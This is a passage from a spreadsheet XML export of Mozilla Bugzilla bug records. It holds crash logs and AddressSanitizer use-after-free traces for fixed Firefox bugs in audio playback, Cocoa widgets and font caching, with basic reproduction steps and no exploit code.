  03AB137C    PPC  0BA644AC  nsWebShellWindow::Close()+0028C
  03AB128C    PPC  0AC29CE4  nsCOMPtr_base::~nsCOMPtr_base()+00030
  03AB124C    PPC  0B83DF10  DocumentViewerImpl::Release()+3DF10
 Return addresses on the stack
  Stack Addr  Frame Addr   ISA   Caller
   03AB1598                PPC   0AC3965C
nsEventQueueImpl::ProcessPendingEvents()+00018
   03AB1568                PPC   0AC24F60 EventQueueEntry::GetEventQueue()+000A4
   03AB1548    03AB1540    PPC   0AD0207C PL_ProcessPendingEvents+0007C
   03AB1528    03AB1520    PPC   0AC29CE4 nsCOMPtr_base::~nsCOMPtr_base()+00030
   03AB1518    03AB1510    PPC   0AC39E58
nsEventQueueImpl::GetYoungestActive(nsIEventQueue**
)+00038
   03AB1508    03AB1500    PPC   0AD02118 PL_HandleEvent+00028
   03AB1500                68K   03AB153E
   03AB14D8    03AB14D0    PPC   0AC29C44 nsQueryInterface::operator()(const
nsID&amp;, void**) c
onst+00028
   03AB14B8    03AB14B0    PPC   0AD1B6B8 PR_ExitMonitor+00054
   03AB14A8    03AB14A0    PPC   0AC6C644 EventHandler(PLEvent*)+00044
   03AB146C                68K   0018719A 'scod BFAF 0002'+04BCA
   03AB1468    03AB1460    PPC   0AC65940 XPTC_InvokeByIndex+0000C
   03AB1448    03AB1440    PPC   001B758C EmToNatEndMoveParams+00014
   03AB1428    03AB1420    PPC   0AD69658 malloc+00040
   03AB1408    03AB1400    PPC   0C237284 InitFloatingWindows+00764
   03AB13C8    03AB13C0    PPC   0C237284 InitFloatingWindows+00764
   03AB13C4    03AB13BC    PPC   0AC65A48 _XPTC_InvokeByIndex+000C8
   03AB139C    03AB1398    68K   0018719A 'scod BFAF 0002'+04BCA
   03AB1388    03AB1380    PPC   001B758C EmToNatEndMoveParams+00014
   03AB1384    03AB137C    PPC   0A03B4E0 nsInstallProgressDialog::Close()+3B4E0
   03AB12F8    03AB12F0    PPC   0C261840
   03AB12E8    03AB12E0    PPC   FFD570B4 CheckUpdate+0001C
   03AB12BA    03AB12B6    68K   FFC7F44E _FreeAlert+00E56
   03AB1298                68K   FFC7FAB0 _FreeAlert+014B8
   03AB1294    03AB128C    PPC   0BA644AC nsWebShellWindow::Close()+0028C
   03AB125A                68K   FFC7F9AA _FreeAlert+013B2
   03AB1254    03AB124C    PPC   0AC29CE4 nsCOMPtr_base::~nsCOMPtr_base()+00030
   03AB1234    03AB122C    PPC   0BA70B48
nsAppShellService::UnregisterTopLevelWindow(nsIWebS
hellWindow*)+000C8
   03AB1214    03AB120C    PPC   0B83DF10 DocumentViewerImpl::Release()+3DF10
   03AB11E4    03AB11DC    PPC   0B9ECA14 nsMacWindow::~nsMacWindow()+000EC
   03AB11C4    03AB11BC    PPC   0BADE540 nsWebShell::operator
delete(void*)+0000C
   03AB11B4    03AB11AC    PPC   0B83E1F4
DocumentViewerImpl::~DocumentViewerImpl()+3E1F4
 Displaying memory from 0
  00000000  FFC1 0000 FFC1 0000  0037 2626 0018 2628  �¡€€�¡€€€7&amp;&amp;€€&amp;(
  00000010  0018 262A 0018 262C  FFC0 31A8 FFC0 31AA  €€&amp;*€€&amp;,�¿1®�¿1�
 Closing log
RESULT:
Progress dialog appears and installation occurs.  When this completes, a crash
occurs.  There is no information recorded to the Install.log or the version
registry.
EXPECTED RESULT:
Installation occurs along with recording to Install.log and version registry.
No crash follows.</t>
        </is>
      </c>
      <c r="X5895" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5896">
      <c r="A5896" t="n">
        <v>1175396</v>
      </c>
      <c r="B5896" t="inlineStr">
        <is>
          <t>2015-06-16 21:23:57 -0700</t>
        </is>
      </c>
      <c r="C5896" t="inlineStr">
        <is>
          <t>out of bounds read at mozilla::AudioSink::PlayFromAudioQueue()</t>
        </is>
      </c>
      <c r="D5896" t="inlineStr">
        <is>
          <t>2024-05-30 09:02:27 -0700</t>
        </is>
      </c>
      <c r="E5896" t="n">
        <v>1</v>
      </c>
      <c r="F5896" t="n">
        <v>1</v>
      </c>
      <c r="G5896" t="n">
        <v>3</v>
      </c>
      <c r="H5896" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5896" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5896" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K5896" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5896" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5896" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5896" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5896" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5896" t="inlineStr">
        <is>
          <t>[adv-main40+][adv-esr38.2+]</t>
        </is>
      </c>
      <c r="Q5896" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5896" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5896" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T5896" t="n">
        <v>1</v>
      </c>
      <c r="U5896" t="n">
        <v>0</v>
      </c>
      <c r="V5896" t="n">
        <v>23</v>
      </c>
      <c r="W5896" t="inlineStr">
        <is>
          <t>Created attachment 8623460
ff-uaf-audiostream.mp3
A use-after-free occurs whenever the attached mp3 is opened via the page I'll add in a sec. This happens at least in freshly installed 64-bit Ubuntu using the last few tinderbox asan builds.
Bug 1093150 is about something on mostly Windows with a very similar trace.
==9814==ERROR: AddressSanitizer: heap-use-after-free on address 0x6210001668ff at pc 0x7f803058eb2b bp 0x7f80017a21c0 sp 0x7f80017a21b8
READ of size 9216 at 0x6210001668ff thread T36 (Media Audio)
    #0 0x7f803058eb2a in mozilla::AudioStream::Write(float const*, unsigned int, mozilla::TimeStamp*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/media/AudioStream.h:117
    #1 0x7f803058b7a8 in mozilla::AudioSink::PlayFromAudioQueue() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/media/AudioSink.cpp:354
    #2 0x7f803058941c in mozilla::AudioSink::AudioLoop() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/media/AudioSink.cpp:219
    #3 0x7f80305a9860 in nsRunnableMethodImpl&lt;void (mozilla::AudioSink::*)(), true&gt;::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dom/media/../../dist/include/nsThreadUtils.h:618
    #4 0x7f802c06dbe7 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:846
    #5 0x7f802c0e78aa in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
    #6 0x7f802c93ccd9 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:326
    #7 0x7f802c8ca4ec in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:233
    #8 0x7f802c06a4fc in nsThread::ThreadFunc(void*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:359
    #9 0x7f8038c51135 in _pt_root /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:212
    #10 0x7f803928e6a9 in start_thread /build/buildd/glibc-2.21/nptl/pthread_create.c:333
    #11 0x7f8029c03eec in clone /build/buildd/glibc-2.21/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:109</t>
        </is>
      </c>
      <c r="X5896" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5897">
      <c r="A5897" t="n">
        <v>1472629</v>
      </c>
      <c r="B5897" t="inlineStr">
        <is>
          <t>2018-07-02 01:33:18 -0700</t>
        </is>
      </c>
      <c r="C5897" t="inlineStr">
        <is>
          <t>Crash in CrashReporter::TerminateHandler | libc++abi.dylib@0x260a0</t>
        </is>
      </c>
      <c r="D5897" t="inlineStr">
        <is>
          <t>2018-08-15 20:35:53 -0700</t>
        </is>
      </c>
      <c r="E5897" t="n">
        <v>1</v>
      </c>
      <c r="F5897" t="n">
        <v>1</v>
      </c>
      <c r="G5897" t="n">
        <v>3</v>
      </c>
      <c r="H5897" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5897" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5897" t="inlineStr">
        <is>
          <t>Widget: Cocoa</t>
        </is>
      </c>
      <c r="K5897" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5897" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5897" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5897" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5897" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5897" t="inlineStr"/>
      <c r="Q5897" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5897" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5897" t="inlineStr">
        <is>
          <t>mozilla63</t>
        </is>
      </c>
      <c r="T5897" t="n">
        <v>1</v>
      </c>
      <c r="U5897" t="n">
        <v>0</v>
      </c>
      <c r="V5897" t="n">
        <v>13</v>
      </c>
      <c r="W5897" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is
report bp-e38e89fd-a601-4513-8375-2b5e80180701.
=============================================================
Top 10 frames of crashing thread:
0 XUL CrashReporter::TerminateHandler toolkit/crashreporter/nsExceptionHandler.cpp:1435
1 libc++abi.dylib libc++abi.dylib@0x260a0 
2 libc++abi.dylib libc++abi.dylib@0x25b2f 
3 libobjc.A.dylib libobjc.A.dylib@0xe897 
4 CoreFoundation CoreFoundation@0x163bd8 
5 AppKit AppKit@0xb1391 
6 XUL -[BaseWindow accessibilityAttributeValue:] widget/cocoa/nsCocoaWindow.mm:3457
7 AppKit AppKit@0xb1296 
8 AppKit AppKit@0xb0677 
9 AppKit AppKit@0xb000d 
=============================================================
This is caused by an uncaught exception.</t>
        </is>
      </c>
      <c r="X5897" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5898">
      <c r="A5898" t="n">
        <v>1701942</v>
      </c>
      <c r="B5898" t="inlineStr">
        <is>
          <t>2021-03-30 07:19:14 -0700</t>
        </is>
      </c>
      <c r="C5898" t="inlineStr">
        <is>
          <t>AddressSanitizer: heap-use-after-free at gfxFont.h GetUnicodeRangeMap in RefPtr.h get</t>
        </is>
      </c>
      <c r="D5898" t="inlineStr">
        <is>
          <t>2024-05-30 10:29:35 -0700</t>
        </is>
      </c>
      <c r="E5898" t="n">
        <v>1</v>
      </c>
      <c r="F5898" t="n">
        <v>1</v>
      </c>
      <c r="G5898" t="n">
        <v>3</v>
      </c>
      <c r="H5898" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5898" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5898" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K5898" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5898" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5898" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5898" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5898" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5898" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][sec-survey][adv-main88+]</t>
        </is>
      </c>
      <c r="Q5898" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5898" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5898" t="inlineStr">
        <is>
          <t>89 Branch</t>
        </is>
      </c>
      <c r="T5898" t="n">
        <v>1</v>
      </c>
      <c r="U5898" t="n">
        <v>0</v>
      </c>
      <c r="V5898" t="n">
        <v>29</v>
      </c>
      <c r="W5898" t="inlineStr">
        <is>
          <t>Created attachment 9212511
testcase.html
After open the testcase, then close the tab, the tab crash with `SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:286:27 in get`. 
I'm currently able to reproduce this on Firefox ASan Nightly 89.0a1 (2021-03-30) (64-bit) from fuzzfetch m-c-20210330035059-fuzzing-asan-opt.
## Steps to reproduce:
1. Open Firefox ASan Nightly from terminal (to view the ASan output)
2. Visit the testcase.html
3. Close the tab
4. On the console, ASan will show output "AddressSanitizer: heap-use-after-free"
## ASan output:
```
=================================================================
==1163767==ERROR: AddressSanitizer: heap-use-after-free on address 0x61400055a288 at pc 0x7f639ce90178 bp 0x7ffcb518b280 sp 0x7ffcb518b278
READ of size 8 at 0x61400055a288 thread T0 (file:// Content)
    #0 0x7f639ce90177 in get /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:286:27
    #1 0x7f639ce90177 in GetUnicodeRangeMap /builds/worker/workspace/obj-build/dist/include/gfxFont.h:1764:29
    #2 0x7f639ce90177 in gfxFontCache::HashEntry::KeyEquals(gfxFontCache::Key const*) const /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp:220:55
    #3 0x7f639a05767c in SearchTable&lt;PLDHashTable::ForSearchOrRemove, (lambda at /builds/worker/checkouts/gecko/xpcom/ds/PLDHashTable.cpp:500:7), (lambda at /builds/worker/checkouts/gecko/xpcom/ds/PLDHashTable.cpp:501:7)&gt; /builds/worker/checkouts/gecko/xpcom/ds/PLDHashTable.cpp:375:11
    #4 0x7f639a05767c in PLDHashTable::Search(void const*) const /builds/worker/checkouts/gecko/xpcom/ds/PLDHashTable.cpp:498:10
    #5 0x7f639ce90f70 in GetEntry /builds/worker/workspace/obj-build/dist/include/nsTHashtable.h:289:16
    #6 0x7f639ce90f70 in gfxFontCache::DestroyFont(gfxFont*) /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp:282:29
    #7 0x7f639ce90e22 in gfxFontCache::NotifyReleased(gfxFont*) /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp:264:5
    #8 0x7f639cfd3eb7 in NotifyReleased /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.h:1440:14
    #9 0x7f639cfd3eb7 in Release /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.h:1415:7
    #10 0x7f639cfd3eb7 in gfxFontGroup::FamilyFace::~FamilyFace() /builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.h:1230:9
    #11 0x7f639cfff5e7 in Destruct /builds/worker/workspace/obj-build/dist/include/nsTArray.h:645:45
    #12 0x7f639cfff5e7 in nsTArray_Impl&lt;gfxFontGroup::FamilyFace, nsTArrayInfallibleAllocator&gt;::DestructRange(unsigned long, unsigned long) /builds/worker/workspace/obj-build/dist/include/nsTArray.h:2404:7
    #13 0x7f639cfd27df in ClearAndRetainStorage /builds/worker/workspace/obj-build/dist/include/nsTArray.h:1482:5
    #14 0x7f639cfd27df in nsTArray_Impl&lt;gfxFontGroup::FamilyFace, nsTArrayInfallibleAllocator&gt;::~nsTArray_Impl() /builds/worker/workspace/obj-build/dist/include/nsTArray.h:1037:7
    #15 0x7f639cfd26e6 in gfxFontGroup::~gfxFontGroup() /builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.cpp:1859:1
    #16 0x7f639cfd286d in gfxFontGroup::~gfxFontGroup() /builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.cpp:1856:31
    #17 0x7f639c785303 in Release /builds/worker/workspace/obj-build/dist/include/gfxFont.h:588:3
    #18 0x7f639c785303 in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:50:40
    #19 0x7f639c785303 in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:381:36
    #20 0x7f639c785303 in ~RefPtr /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:81:7
    #21 0x7f639c785303 in nsFontMetrics::~nsFontMetrics() /builds/worker/checkouts/gecko/gfx/src/nsFontMetrics.cpp:145:1
    #22 0x7f639c7694c5 in Release /builds/worker/checkouts/gecko/gfx/src/nsFontMetrics.h:74:3
    #23 0x7f639c7694c5 in nsFontCache::Flush(int) /builds/worker/checkouts/gecko/gfx/src/nsDeviceContext.cpp:229:5
    #24 0x7f639c76a7d2 in nsDeviceContext::~nsDeviceContext() /builds/worker/checkouts/gecko/gfx/src/nsDeviceContext.cpp:254:17
    #25 0x7f63a21fb7cc in Release /builds/worker/workspace/obj-build/dist/include/nsDeviceContext.h:43:3
    #26 0x7f63a21fb7cc in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:50:40
    #27 0x7f63a21fb7cc in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:381:36
    #28 0x7f63a21fb7cc in ~RefPtr /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:81:7
    #29 0x7f63a21fb7cc in nsPresContext::~nsPresContext() /builds/worker/checkouts/gecko/layout/base/nsPresContext.cpp:308:1
    #30 0x7f63a22128f7 in ~nsRootPresContext /builds/worker/checkouts/gecko/layout/base/nsPresContext.h:1366:7
    #31 0x7f63a22128f7 in nsRootPresContext::~nsRootPresContext() /builds/worker/checkouts/gecko/layout/base/nsPresContext.h:1366:7
    #32 0x7f6399ffe702 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:2421:7
    #33 0x7f6399ffdb66 in nsCycleCollector::FreeSnowWhite(bool) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:2611:3
    #34 0x7f639a005719 in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:3592:3
    #35 0x7f639a004e0e in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:3415:9
    #36 0x7f639a004925 in nsCycleCollector::ShutdownCollect() /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:3358:20
    #37 0x7f639a006976 in nsCycleCollector::Shutdown(bool) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:3653:5
    #38 0x7f639a008503 in nsCycleCollector_shutdown(bool) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:3968:18
    #39 0x7f639a227f3a in mozilla::ShutdownXPCOM(nsIServiceManager*) /builds/worker/checkouts/gecko/xpcom/build/XPCOMInit.cpp:706:3
    #40 0x7f63a568c85c in XRE_TermEmbedding() /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:212:3
    #41 0x7f639b406304 in mozilla::ipc::ScopedXREEmbed::Stop() /builds/worker/checkouts/gecko/ipc/glue/ScopedXREEmbed.cpp:90:5
    #42 0x7f63a568d3b3 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:738:16
    #43 0x557a2acdbc8d in content_process_main(mozilla::Bootstrap*, int, char**) /builds/worker/checkouts/gecko/browser/app/../../ipc/contentproc/plugin-container.cpp:57:28
    #44 0x557a2acdc0b1 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:309:18
    #45 0x7f63ba8f9b24 in __libc_start_main (/usr/lib/libc.so.6+0x27b24)
    #46 0x557a2ac2f629 in _start (/tmp/m-c-20210330035059-fuzzing-asan-opt/firefox+0x5a629)
0x61400055a288 is located 72 bytes inside of 400-byte region [0x61400055a240,0x61400055a3d0)
freed by thread T0 (file:// Content) here:
    #0 0x557a2aca923d in free /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3
    #1 0x7f639ce90fcd in gfxFontCache::DestroyFont(gfxFont*) /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp:288:3
    #2 0x7f639ce90e22 in gfxFontCache::NotifyReleased(gfxFont*) /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp:264:5
    #3 0x7f639cfd3eb7 in NotifyReleased /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.h:1440:14
    #4 0x7f639cfd3eb7 in Release /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.h:1415:7
    #5 0x7f639cfd3eb7 in gfxFontGroup::FamilyFace::~FamilyFace() /builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.h:1230:9
    #6 0x7f639cfff5e7 in Destruct /builds/worker/workspace/obj-build/dist/include/nsTArray.h:645:45
    #7 0x7f639cfff5e7 in nsTArray_Impl&lt;gfxFontGroup::FamilyFace, nsTArrayInfallibleAllocator&gt;::DestructRange(unsigned long, unsigned long) /builds/worker/workspace/obj-build/dist/include/nsTArray.h:2404:7
    #8 0x7f639cfd27df in ClearAndRetainStorage /builds/worker/workspace/obj-build/dist/include/nsTArray.h:1482:5
    #9 0x7f639cfd27df in nsTArray_Impl&lt;gfxFontGroup::FamilyFace, nsTArrayInfallibleAllocator&gt;::~nsTArray_Impl() /builds/worker/workspace/obj-build/dist/include/nsTArray.h:1037:7
    #10 0x7f639cfd26e6 in gfxFontGroup::~gfxFontGroup() /builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.cpp:1859:1
    #11 0x7f639cfd286d in gfxFontGroup::~gfxFontGroup() /builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.cpp:1856:31
    #12 0x7f639c785303 in Release /builds/worker/workspace/obj-build/dist/include/gfxFont.h:588:3
    #13 0x7f639c785303 in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:50:40
    #14 0x7f639c785303 in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:381:36
    #15 0x7f639c785303 in ~RefPtr /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:81:7
    #16 0x7f639c785303 in nsFontMetrics::~nsFontMetrics() /builds/worker/checkouts/gecko/gfx/src/nsFontMetrics.cpp:145:1
    #17 0x7f639c7694c5 in Release /builds/worker/checkouts/gecko/gfx/src/nsFontMetrics.h:74:3
    #18 0x7f639c7694c5 in nsFontCache::Flush(int) /builds/worker/checkouts/gecko/gfx/src/nsDeviceContext.cpp:229:5
    #19 0x7f639c76a7d2 in nsDeviceContext::~nsDeviceContext() /builds/worker/checkouts/gecko/gfx/src/nsDeviceContext.cpp:254:17
    #20 0x7f63a21fb7cc in Release /builds/worker/workspace/obj-build/dist/include/nsDeviceContext.h:43:3
    #21 0x7f63a21fb7cc in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:50:40
    #22 0x7f63a21fb7cc in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:381:36
    #23 0x7f63a21fb7cc in ~RefPtr /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:81:7
    #24 0x7f63a21fb7cc in nsPresContext::~nsPresContext() /builds/worker/checkouts/gecko/layout/base/nsPresContext.cpp:308:1
    #25 0x7f63a22128f7 in ~nsRootPresContext /builds/worker/checkouts/gecko/layout/base/nsPresContext.h:1366:7
    #26 0x7f63a22128f7 in nsRootPresContext::~nsRootPresContext() /builds/worker/checkouts/gecko/layout/base/nsPresContext.h:1366:7
    #27 0x7f6399ffe702 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:2421:7
    #28 0x7f6399ffdb66 in nsCycleCollector::FreeSnowWhite(bool) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:2611:3
    #29 0x7f639a005719 in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:3592:3
    #30 0x7f639a004e0e in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:3415:9
    #31 0x7f639a004925 in nsCycleCollector::ShutdownCollect() /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:3358:20
    #32 0x7f639a006976 in nsCycleCollector::Shutdown(bool) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:3653:5
    #33 0x7f639a008503 in nsCycleCollector_shutdown(bool) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:3968:18
    #34 0x7f639a227f3a in mozilla::ShutdownXPCOM(nsIServiceManager*) /builds/worker/checkouts/gecko/xpcom/build/XPCOMInit.cpp:706:3
    #35 0x7f63a568c85c in XRE_TermEmbedding() /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:212:3
    #36 0x7f639b406304 in mozilla::ipc::ScopedXREEmbed::Stop() /builds/worker/checkouts/gecko/ipc/glue/ScopedXREEmbed.cpp:90:5
    #37 0x7f63a568d3b3 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:738:16
    #38 0x557a2acdbc8d in content_process_main(mozilla::Bootstrap*, int, char**) /builds/worker/checkouts/gecko/browser/app/../../ipc/contentproc/plugin-container.cpp:57:28
    #39 0x557a2acdc0b1 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:309:18
    #40 0x7f63ba8f9b24 in __libc_start_main (/usr/lib/libc.so.6+0x27b24)
previously allocated by thread T0 (file:// Content) here:
    #0 0x557a2aca94bd in malloc /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145:3
    #1 0x557a2ace2e4d in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7f639ce19443 in operator new /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:33:10
    #3 0x7f639ce19443 in gfxFontconfigFontEntry::CreateFontInstance(gfxFontStyle const*) /builds/worker/checkouts/gecko/gfx/thebes/gfxFcPlatformFontList.cpp:873:22
    #4 0x7f639ce6a183 in gfxFontEntry::FindOrMakeFont(gfxFontStyle const*, gfxCharacterMap*) /builds/worker/checkouts/gecko/gfx/thebes/gfxFontEntry.cpp:281:24
    #5 0x7f639cfd44ad in gfxFontGroup::GetFontAt(int, unsigned int, bool*) /builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.cpp:2058:16
    #6 0x7f639cfd5ca2 in gfxFontGroup::GetFirstValidFont(unsigned int, mozilla::StyleGenericFontFamily*) /builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.cpp:2280:12
    #7 0x7f639c78630a in GetMetrics(nsFontMetrics*, nsFontMetrics::FontOrientation) /builds/worker/checkouts/gecko/gfx/src/nsFontMetrics.cpp:155:46
    #8 0x7f639c785f2d in GetMetrics /builds/worker/checkouts/gecko/gfx/src/nsFontMetrics.cpp:160:10
    #9 0x7f639c785f2d in nsFontMetrics::MaxAscent() /builds/worker/checkouts/gecko/gfx/src/nsFontMetrics.cpp:234:10
    #10 0x7f63a21d26de in nsLayoutUtils::GetCenteredFontBaseline(nsFontMetrics*, int, bool) /builds/worker/checkouts/gecko/layout/base/nsLayoutUtils.cpp:5674:64
    #11 0x7f63a24a8730 in nsLineLayout::VerticalAlignFrames(nsLineLayout::PerSpanData*) /builds/worker/checkouts/gecko/layout/generic/nsLineLayout.cpp:2284:31
    #12 0x7f63a24aa175 in nsLineLayout::VerticalAlignLine() /builds/worker/checkouts/gecko/layout/generic/nsLineLayout.cpp:1506:3
    #13 0x7f63a229954b in nsBlockFrame::PlaceLine(mozilla::BlockReflowInput&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFloatManager::SavedState*, nsFlowAreaRect&amp;, int&amp;, bool*) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:4867:15
    #14 0x7f63a2297f12 in nsBlockFrame::DoReflowInlineFrames(mozilla::BlockReflowInput&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFlowAreaRect&amp;, int&amp;, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:4461:12
    #15 0x7f63a2290dae in nsBlockFrame::ReflowInlineFrames(mozilla::BlockReflowInput&amp;, nsLineList_iterator, bool*) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:4219:9
    #16 0x7f63a228a6b9 in nsBlockFrame::ReflowLine(mozilla::BlockReflowInput&amp;, nsLineList_iterator, bool*) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:3199:5
    #17 0x7f63a22824a0 in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&amp;) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:2733:7
    #18 0x7f63a227ccff in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:1375:3
